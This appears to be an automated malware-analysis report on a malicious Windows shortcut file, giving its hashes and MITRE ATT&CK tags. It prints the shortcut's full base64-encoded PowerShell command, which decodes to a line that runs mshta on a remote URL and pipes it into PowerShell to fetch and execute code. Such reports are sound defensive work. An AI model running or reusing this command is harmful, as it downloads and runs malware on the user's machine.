Malicious

d417f07b8eac10d7e14bacae56002256

LNK File | MD5: d417f07b8eac10d7e14bacae56002256 | Size: 1.34 KB | application/x-ms-shortcut

LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Characteristics
Hash
Hash Value
MD5
d417f07b8eac10d7e14bacae56002256
Sha1
244452034b44ea99af6dc2217546987898f7a3f4
Sha256
2feda833dd94e3ff4a1c549814deb6552e162f36023a7aa400104ed528a1e190
Sha384
9a8588ff1dfd33603ab4ab6f966480670e688b010c09597d99d22c74fcc10a28c83b742404aa344521470ddfa2d4dbca
Sha512
e2b2d061dbb56b4ff8f3ef5f117c600e1464f798a48b195a4aef89db2267ca32b68624bb7fca2ef4f0582836cce755bdbe1b01a7c90c621db74e1cb25704ddd0
SSDeep
24:8hp/BHYVKVWf+/CWfO0lZseWrN8RqDcCB4PYP+uBarab7Z:8X5a4Tw3JDDc4gFA4aZ
TLSH
542138140EE20250E1B787757BFDB722C876BC95D95A9BE9014085405B34250F8F5F3F
File Structure
d417f07b8eac10d7e14bacae56002256
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Artefacts
Name
Value
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAG0AcwBoAHQAYQAgACcAOwAoAGcAYwBiACkAIAArACAAJwBoAHQAdABwAHMAOgAvAC8AawByAGkAZQB6AC4AdwBvAHIAawAvAFQAYQB3AGwAZQB5AC4AbQBwADQAJwAgAHwAIABwAG8AdwBlAHIAcwBoAGUAbABsAA==

Deobfuscated PowerShell

-e "cwBjAGIAIAAnAG0AcwBoAHQAYQAgACcAOwAoAGcAYwBiACkAIAArACAAJwBoAHQAdABwAHMAOgAvAC8AawByAGkAZQB6AC4AdwBvAHIAawAvAFQAYQB3AGwAZQB5AC4AbQBwADQAJwAgAHwAIABwAG8AdwBlAHIAcwBoAGUAbABsAA=="

Characteristics
No malware configuration was found at this point.